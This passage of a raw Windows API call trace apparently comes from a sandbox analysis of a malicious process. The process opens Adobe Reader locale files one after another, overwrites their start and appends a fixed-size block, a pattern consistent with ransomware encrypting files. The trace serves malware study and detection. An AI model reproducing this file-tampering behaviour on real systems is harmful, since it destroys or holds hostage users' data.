(x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\accessibility.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.559] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.559] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb200 [0079.560] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.560] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.560] ReleaseMutex (hMutex=0x168) returned 1 [0079.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.RUM", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.RUM", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.RUM", lpUsedDefaultChar=0x0) returned 17 [0079.560] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.574] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa200 [0079.574] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.599] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa200 [0079.599] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.599] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.599] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.600] CloseHandle (hObject=0x1ec) returned 1 [0079.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\eBook.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\ebook.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.843] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.843] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c00 [0079.843] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.843] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.844] ReleaseMutex (hMutex=0x168) returned 1 [0079.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.RUM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0079.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.RUM", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.RUM", lpUsedDefaultChar=0x0) returned 9 [0079.844] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0079.852] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0079.852] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x311f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0079.853] CloseHandle (hObject=0x1ec) returned 1 [0079.853] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\ReadOutLoud.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\readoutloud.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.853] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.854] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2c00 [0079.854] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.854] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.854] ReleaseMutex (hMutex=0x168) returned 1 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.RUM", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.RUM", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.RUM", lpUsedDefaultChar=0x0) returned 15 [0079.854] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0080.998] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c00 [0080.998] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.070] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c00 [0081.070] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.075] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.075] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.076] CloseHandle (hObject=0x1ec) returned 1 [0081.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Updater.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\updater.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.076] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.077] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0081.077] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.077] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.077] ReleaseMutex (hMutex=0x168) returned 1 [0081.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.RUM", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.RUM", lpUsedDefaultChar=0x0) returned 11 [0081.077] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0081.083] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.084] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0081.084] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.085] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.085] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.085] CloseHandle (hObject=0x1ec) returned 1 [0081.085] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\DigSig.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\digsig.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.087] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.087] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1f600 [0081.087] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.087] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.087] ReleaseMutex (hMutex=0x168) returned 1 [0081.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.RUS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.RUS", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.RUS", lpUsedDefaultChar=0x0) returned 10 [0081.087] ReadFile (in: hFile=0x1ec, lpBuffer=0x25aa0a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25aa0a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.188] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1e600 [0081.188] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1e600 [0081.190] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.190] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.190] CloseHandle (hObject=0x1ec) returned 1 [0081.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\PPKLITE.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\ppklite.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.191] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.191] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x80400 [0081.191] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.191] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.191] ReleaseMutex (hMutex=0x168) returned 1 [0081.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.RUS", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.RUS", lpUsedDefaultChar=0x0) returned 11 [0081.192] ReadFile (in: hFile=0x1ec, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.366] ReadFile (in: hFile=0x1ec, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.367] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7f400 [0081.367] ReadFile (in: hFile=0x1ec, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.370] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7f400 [0081.370] WriteFile (in: hFile=0x1ec, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.371] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.371] WriteFile (in: hFile=0x1ec, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.371] WriteFile (in: hFile=0x1ec, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.371] CloseHandle (hObject=0x1ec) returned 1 [0081.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.372] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.372] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xf5 [0081.372] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.372] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.373] ReleaseMutex (hMutex=0x168) returned 1 [0081.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0081.373] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eec408, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eec408*, lpNumberOfBytesRead=0x311f2bc*=0xf5, lpOverlapped=0x0) returned 1 [0081.374] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0081.374] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x67d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x311f2d0*=0x67d, lpOverlapped=0x0) returned 1 [0081.374] CloseHandle (hObject=0x1ec) returned 1 [0081.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\BRdlang32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\brdlang32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.375] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.375] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3400 [0081.375] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.376] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.376] ReleaseMutex (hMutex=0x168) returned 1 [0081.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SKY", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SKY", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.SKY", lpUsedDefaultChar=0x0) returned 13 [0081.376] ReadFile (in: hFile=0x1ec, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.378] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2400 [0081.378] ReadFile (in: hFile=0x1ec, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.378] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2400 [0081.379] WriteFile (in: hFile=0x1ec, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.379] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.379] WriteFile (in: hFile=0x1ec, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.379] CloseHandle (hObject=0x1ec) returned 1 [0081.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Multimedia.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\multimedia.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.380] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.380] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, 